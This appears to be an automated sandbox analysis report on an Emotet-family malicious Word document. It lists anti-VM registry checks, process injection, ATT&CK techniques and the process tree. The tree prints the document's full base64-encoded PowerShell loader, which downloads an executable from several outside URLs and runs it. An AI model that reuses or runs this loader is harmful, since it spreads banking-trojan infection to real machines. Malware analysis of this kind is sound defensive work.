910b6b7ca4acd16965d4bbe1ab34ba9620cf52a6f5d0466cb470ff62d9456867

General

Target

Docs_2d2bb0066e53360135c9cf5985000a08.1
Sample

191011-ra89c1wmj2
SHA256

910b6b7ca4acd16965d4bbe1ab34ba9620cf52a6f5d0466cb470ff62d9456867

Score

N/A

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 4 IoCs

Processes:

WINWORD.EXE

at	description	ioc	process
11968	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
12078	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
16234	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_2d2bb0066e53360135c9cf5985000a08.1.doc	WINWORD.EXE
17468	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_2d2bb0066e53360135c9cf5985000a08.1.doc	WINWORD.EXE

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
16109	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	WINWORD.EXE
16109	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	WINWORD.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
16109	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
16109	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
16109	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
16109	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
16109	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
16109	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
16109	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

SppExtComObj.exepowershell.exe856.exetabletmspterm.exe

at	description	process	target process
17750	PID 3956 wrote to memory of 4072	SppExtComObj.exe	SLUI.exe
79843	PID 3300 wrote to memory of 2024	powershell.exe	856.exe
80843	PID 2024 wrote to memory of 3804	856.exe	856.exe
137422	PID 3868 wrote to memory of 3064	tabletmspterm.exe	tabletmspterm.exe

Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at description process

53797 Token: SeDebugPrivilege powershell.exe
Suspicious behavior: EnumeratesProcesses
Emotet Sync 1 IoCs
trojan banker

Processes:

856.exe

description ioc process

Event created Global\E145925EC 856.exe
Suspicious behavior: EmotetMutantsSpam
Drops file in system dir 1 IoCs

Processes:

856.exe

at description ioc process

90234 File renamed C:\Users\Admin\856.exe => C:\Windows\SysWOW64\tabletmspterm.exe 856.exe
emotet family
family

at	description	process
53797	Token: SeDebugPrivilege	powershell.exe

description	ioc	process
Event created	Global\E145925EC	856.exe

at	description	ioc	process
90234	File renamed	C:\Users\Admin\856.exe => C:\Windows\SysWOW64\tabletmspterm.exe	856.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_2d2bb0066e53360135c9cf5985000a08.1.doc" /o ""
1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:3672

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3956

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:4072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiAGIAMQA0ADcAeAAwADgAMABjADIAPQAnAHgAMgA3ADMAMAA1ADAAMwBjAGIAMAA2ACcAOwAkAGIANQB4ADAAYwA0AGMANgBiADMANAA4ADgAIAA9ACAAJwA4ADUANgAnADsAJABjAGIAMAA1AGMANgA1ADEAMABjADAAMAA3AD0AJwBjADAAMQA4ADMAMAA5AHgAMABjADIAJwA7ACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgA1AHgAMABjADQAYwA2AGIAMwA0ADgAOAArACcALgBlAHgAZQAnADsAJAB4ADMAMAA5ADQAeAAwADkAYwAwAGIAMAA9ACcAYwBjADAAOAAyADYAMAAyAHgAMwAxACcAOwAkAHgAYwAyAGMAMgA5ADUAeAAyADAAOAAwADIAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBMAGkARQBOAFQAOwAkAGIAMAAwAGIAMQAzADcAMQAwADgAMQA9ACcAaAB0AHQAcAA6AC8ALwB4AHMAbgBvAG4AbABpAG4AZQAuAHUAcwAvAGIAbABvAGcAcwAvADQAeAA0ADYANgB2AC8AKgBoAHQAdABwADoALwAvAG8AYgBiAHkAZABlAGUAbQB1AHMAaQBjAC4AYwBvAG0ALwBhAHEAbwBlAGkAdgBqADQAZgBkAC8AdQBzADUAaAB0AHYAbgAvACoAaAB0AHQAcAA6AC8ALwB2AGUAZQBwAGwAYQBuAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZABXADAAbwAzAFIAbwBKAE4ARwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGsAbQBhAGMAbwBiAGQALgBjAG8AbQAvAHUAOQByAC8AKgBoAHQAdABwADoALwAvAGEAaQBqAGQAagB5AC4AYwBvAG0ALwBkAHUAcAAtAGkAbgBzAHQAYQBsAGwAZQByAC8AdAAwAC8AJwAuACIAcwBwAEwAYABpAFQAIgAoACcAKgAnACkAOwAkAGMAeABjADIAMAAwADAAMQA1ADMAYgA9ACcAYwA3ADgAeABiADgANwA5ADAAMAAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAYwAxADYAOAAwADEANAAzADAAYwB4ACAAaQBuACAAJABiADAAMABiADEAMwA3ADEAMAA4ADEAKQB7AHQAcgB5AHsAJAB4AGMAMgBjADIAOQA1AHgAMgAwADgAMAAyAC4AIgBEAG8AdwBOAEwAYABPAEEAZABmAGkAYABMAGUAIgAoACQAYgBjADEANgA4ADAAMQA0ADMAMABjAHgALAAgACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwApADsAJABiADkAMwA2ADYAYgAwADAAOAB4ADYAPQAnAGMAMAAzADAAMABjADkAOAAyADcAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAHgAYwAwAHgANQA3AGIAMwA4AGIAMgB4ADcAKQAuACIAbABgAGUAbgBnAFQAaAAiACAALQBnAGUAIAAyADQANQAxADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQByAFQAIgAoACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwApADsAJABiAHgAYwAxADAAMAA1ADIANQBjADAANwA0AD0AJwBjADcANgAwADQAMAAwADcAeAB4ADMAMgA4ACcAOwBiAHIAZQBhAGsAOwAkAGIAMgAwADMANwAwADYAMAA5ADQAOQA9ACcAeAB4ADIAMABiADkAMwAwADQAMwBjADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAeABjADUANgAwADAAMwA5ADUAOAB4AHgAPQAnAGMAMAA1ADkAMgAzADQAMAAwADYAYwAwACcA
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:3300

C:\Users\Admin\856.exe
"C:\Users\Admin\856.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2024

C:\Users\Admin\856.exe
--d025e3d7
1⤵
- Emotet Sync
- Drops file in system dir
PID:3804

C:\Windows\SysWOW64\tabletmspterm.exe
"C:\Windows\SysWOW64\tabletmspterm.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3868

C:\Windows\SysWOW64\tabletmspterm.exe
--356fff06
1⤵
PID:3064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3064-7-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/3804-4-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads